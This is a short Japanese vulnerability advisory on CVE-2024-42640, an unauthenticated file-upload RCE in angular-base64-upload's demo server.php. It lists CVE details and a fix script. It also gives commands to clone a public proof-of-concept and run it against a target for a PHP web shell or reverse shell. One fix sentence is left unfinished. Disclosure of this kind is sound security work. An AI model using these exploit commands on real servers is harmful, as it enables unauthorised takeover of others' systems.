
Angular-Base64-Uploadライブラリを介した未認証のリモートコード実行
angular-base64-upload の v0.1.21 より前のバージョンは、angular-base64-upload/demo/server.php エンドポイントを介した未認証のリモートコード実行に対して脆弱です。この脆弱性を悪用すると、攻撃者は任意のファイルコンテンツをサーバーにアップロードでき、その後 angular-base64-upload/demo/uploads エンドポイント経由でアクセスできます。これにより、以前にアップロードされたコンテンツが実行され、最終的に攻撃者はサーバー上でコード実行を達成できるようになります。

git clone https://github.com/rvizx/CVE-2024-42640
cd CVE-2024-42640
python3 exploit.py <target> # this will use a php command shell (web-shell)
python3 exploit.py <target> --rev # this will use a php reverse shell
このセキュリティ問題を修正するには、
以下に示す fix.sh スクリプトは、上記の2番目の方法を使用してセキュリティ問題を修正するために開発されました。

git clone https://github.com/rvizx/CVE-2024-42640
cd CVE-2024-42640
chmod +x fix.sh
./fix.sh # example: ./fix.sh /app | tee -a /tmp/verify.log
エクスプロイトタイトル: Angular-Base64-Upload ライブラリによる未認証の RCE
研究者: Ravindu Wickramasinghe | rvz (@rvizx9)
深刻度: 緊急 - 10.0 (CVSS 4.0)
ベンダーホームページ: https://www.npmjs.com/package/angular-base64-upload
ソフトウェアリンク: https://github.com/adonespitogo/angular-base64-upload
ベクター: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
影響を受けるバージョン: < v0.1.21
修正済みバージョン: >= v0.1.21
テスト環境: Arch Linux
CVE : CVE-2024-42640
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-42640
GitHub PoC エクスプロイトリンク: https://github.com/rvizx/CVE-2024-42640
ブログ記事: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html